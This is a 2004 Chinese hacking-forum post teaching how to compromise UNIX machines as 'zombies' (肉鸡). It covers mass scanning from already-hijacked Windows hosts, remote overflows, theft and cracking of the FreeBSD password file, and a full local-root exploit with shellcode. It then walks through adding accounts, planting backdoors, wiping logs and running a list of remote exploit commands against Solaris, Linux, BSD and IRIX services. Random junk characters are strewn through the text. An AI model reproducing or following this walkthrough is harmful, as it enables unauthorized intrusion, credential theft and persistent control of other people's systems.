QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 4231|回复: 0
打印 上一主题 下一主题

如何寻找自己的UNIX肉鸡

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-10-5 18:33 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
今天的话题是怎么样找unix肉鸡,我想这对于一个有很多windows肉鸡而没有unix肉鸡的人是很有必要。
6 e0 Z* p# U( c8 N, m不罗嗦,直入正题。为什么说是我和x-laser一起找肉鸡呢?因为我们的一切操作全部是在3389肉鸡上进行的。首先我们都上到同一个终端,(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理进行id切换(选择用户进行连接)( G. Y) A& ]% M3 e9 D' t; i) ]
4 Q: J  k$ s% b! X" m# }
    这样,两个人就可以互相控制对方了,一举一动都很清楚,这种方法很好,大大提高了效率,也增加了入侵时的乐趣。建议大家推广 :)
  j2 Z" \( p7 `1 ^    下面我们开始工作。由于是在win上搞unix类,所以我们最好要有在win上用的exploit,以得到第一台unix肉鸡。关于在win上用的exploits可以用cygwin编译(在www.isfocus.com)有下载。或者直接去大鹰的主页(e4gle.org)或者红客技术联盟(www.cnhonker.net/old.php)下载,注意了,要一起下那个cygwin1.dll的文件,不然搞不成。
: U; o7 W; n% H4 a现在我们要做的是找出大量unix的肉鸡,然后再去找漏洞,但是怎么找呢?这时候,就请出了我们的languard network scanner,在做了简单的设置让他跑的快点后,我们就开始扫描
4 }) W8 ~- U# X7 d) _( G, F( H/ O# ]' G* B6 h1 \( N, N) l
8 H- N1 g4 w" G) Q
我们看到有一台freebsd,这个系统比较好欺负,因为前段时间有个沸沸扬扬的telnetd远程溢出漏洞。当然我们也可以用superscan来快速判断操作系统.我们用superscan扫23端口,因为telnet上去一般都有banner,从而得知操作系统类型.如下
) o! y/ _+ E& l
& n6 w0 t# S3 B我们扫到了两台linux,….. ..#..’是linux的判断符.& w3 z% N  {; ~: m
……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了.% X2 s( }% G1 R- d, m# r' }; J& O
" f2 @* u$ }; f/ H  `
1 B6 e- i7 N) L
言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后,就开始溢出了。
3 S; f' |# x; s
' q( h* N& d# y0 S! v6 i$ u由于要发送16M的东西,所以可能会慢点
" v3 o3 V6 G6 t8 T) m5 Y7 L0 L) V等到成功后,会出现 command ?
8 ~  J, b, Z! r# o6 p  Y  I  }这是输入 id8 S! E- d# ^4 y" F" k8 h
可以看到自己已经成为root了。当然,大家还可以把shadow抓下来,bsd下的sh% b+ ^3 B3 X* z4 }( v0 }& W
adow文件是/etc/master.passwd,然后john跑个用户名出来(在www.xfocus.net有john的windows下的版本下载,也是用cygwin编译的),再telnet上去,就得到了普通帐号(因为root帐号一般比较难破),再进行本地溢出。为什么要这么麻烦呢?因为我们远程得到的shell很多都没有回显,所以不方便添加帐号。一般在bsd下添加帐号是在/usr/sbin下执行./adduser ,然后按着提示做就可以了,bsd系统很稳定,很多大型网站都是用这个建站,比如红盟。本地溢出的代码我在这里贴一下
  d& Q7 i+ L; O; m, W- R9 F$ m- q8 L" k$ J: h
?受影响版本: FreeBSD 4.3 4.2 4.1 4.0 9 G# u1 x$ C: G5 @' k* g
早期版本也许受影响 测试程序使用方法:  </P>' k, G9 U2 y5 Q! q4 j6 `$ c
netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done #    </P>( \+ l! x+ }* `2 K# ^" j" K$ z
发现 FreeBSD 4.3 存在一个设计上的漏洞,它允许用户在其它进程中插入 signal handlers。 </P>
7 Z  m% O2 _8 |& }' Z题出在 rfork(RFPROC|RFSIGSHARE) ,如果子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制。发送一个信号给子进程将能导致 signal handlers 被执行。 利用此漏洞,本地攻击者能取得 root 权限。 vvfreebsd.c & t6 _' d+ \4 r7 T- n2 Q
" s$ q5 S8 u5 E
    ???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include &lt;stdio.h&gt; #include &lt;signal.h&gt; #include &lt;unistd.h&gt; int vv1; #define MYSIG SIGINT //exec "/tm( E; V, F2 D% e* G& }9 _
    p/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"
: F$ U8 P, `; ?6 x& @% V/ O); while(42); } </P>- t; }& J$ t! W+ ^  l
/* www.xcode.tw.st 极端网络安全小组 */
! i% r! }, a6 @5 m' z  L# B# u) q) V' w5 P) ?

) c8 f; L" q9 w; q( k可以找到可写的地方,然后cat &gt;vv.c 回车+ i+ x( ?8 e6 G
(鼠标右健粘贴)
2 a9 N# G* d! Y# wctrl + d保存
5 S9 V) l, r5 R9 z% I: P: }$gcc –o vv vv.c编译(gcc在solaris和aix等系统下叫做cc)
& D+ B# ]0 J. A9 F$cp /bin/csh /tmp
1 p+ P- a2 I% a* z  v. D* N/ g* w7 ^$./vv
) m, g+ B8 }5 d+ Q# _; ?3 }这样就执行了,一般可以得到root.注意第二句,这是代码的需要0 w2 S, [6 M, a6 L/ w
然后就去adduser然后再放一堆后门上去吧1 _9 Z0 r8 A1 x6 J9 C5 h! o6 G
几点补充:1.命令w查看当前哪些在线,要是看见root就要小心了
6 P2 g! i' B7 Y4 m2
) z: b4 d2 u7 I4 x  g2 W.Whereis gcc查看装了gcc没有,whereis的用法很灵活% @* e. S) @  {7 ]
3如果没装就需要把编译好的传上去,我们一般是申请一个ftp,然后编译好,传到ftp上,在让攻击的机子去下载(51.net的虚拟主机就可以完成这项任务)
2 i" P. m6 w& z! P& ^4 k4记得每次上去要用wipe清理足迹,wipe在小凤居有下载- t/ e9 {4 q3 w7 H% i  G3 O
 </P>
. \1 M0 c9 j  l8 h* V) n另外再附几种常见的exploit的用法
1 B+ V7 |4 H& k; F  k$ h1 b: f) ]8 h$ I3 i

8 W- X2 {( z( b目标主机一律用128.0.0.1代替! 1 statdu[vdp]redhat6.xrpc status远程溢出! </P>
" x! n: p& e" L: v( h溢出程序: statdx 用法: </P>
3 L, E8 b8 p9 b% q./statdx -d 0 128.0.0.1或者 </P>
+ b- n5 P% ]5 {: U1 o) ^./statdx -d 1 128.0.0.1或者 </P>
2 g* l3 I3 y; v$ J" A0 J( w./statdx -d 2 128.0.0.1 </P>
# s5 }- S6 L6 \$ n/ C8 N' D+ m2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出 </P>9 h, ~" b9 F2 P' v2 j/ w+ F
溢出程序: sadmindxbrute 用法 </P>. S* {  w+ d) O) ]' m" }
./sadmindxbrute (主机类型参数) 128.0.0.1 主机参数 1 x86 2.6 2 x86 7.0 3 sparc 2.6 4 sparc 7.0 3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出  </P>8 S  E' v; ?# ~& C6 o3 a, N
所用程序 ttds(已经改名)流光iv的exploit内可以找到 </P>
9 X) g% b# Q# r用法: ./ttds 128.0.0.1 80(攻击断口设置为80)-v6 4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出 </P>
' F- p2 f8 l, [- I6 F! H所用程序 snmpxmid </P>
- v7 d% E+ O% K. A8 \用法: ./snmpxmid 128.0.0.1 -v 7 5 bind 远程溢出 </P>
9 ~0 c5 K" i; h( q5 o/ S4 H程序bind </P>
& `$ T2 U4 w+ @# c. a; `) \用法: ./bind 128.0.0.1 -e 6 irix的telnet远程溢出(这个可能用流光iv扫描不到) </P>+ s4 @( R) @4 W2 O8 I9 b
所用程序telnetd </P>! U9 [9 D6 P/ g$ ~( Q9 N8 m1 t# |! Q
用法: ./telnetd 128.0.0.1 7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell </P>8 Y: F# `' _' i8 C9 {* r/ N
所用程序 utofsd </P>% z) X; R9 t, p& J! ^( B
用法: ./utofsd 128.0.0.1 8 freebsd远程溢出 </P>
2 r% b1 k) {. I/ ^& ~( y* C6 d4 ]$ p7 B这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下使用方法 bsd 128.0.0.1 其他的远程溢出程序也不麻烦 你只要把程序编译好之后输入 ./程序名 --h就可以看到帮助了!
" |' t& g) A2 J, r8 Y
! J4 O" @" m3 L   补充一点,很多写exploit的牛人为了让自己的exploit给真正的黑客用,故意在代码里放了几个错误,所以大家还是要学好编程的这样,就可以根据gcc编译器的错误提示把错误的代码改过来。今天我们讲了怎样找unix类肉鸡,当然还是要看运气,不过我和x-laser在3389肉鸡扫描很疯狂,用superscan一次一般是扫255个c段用languard也扫的很多,所以建议大家多多实践.最后,奉劝一句,不要入侵国内,不要搞破坏! </P>
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-7-17 17:58 , Processed in 0.392634 second(s), 52 queries .

回顶部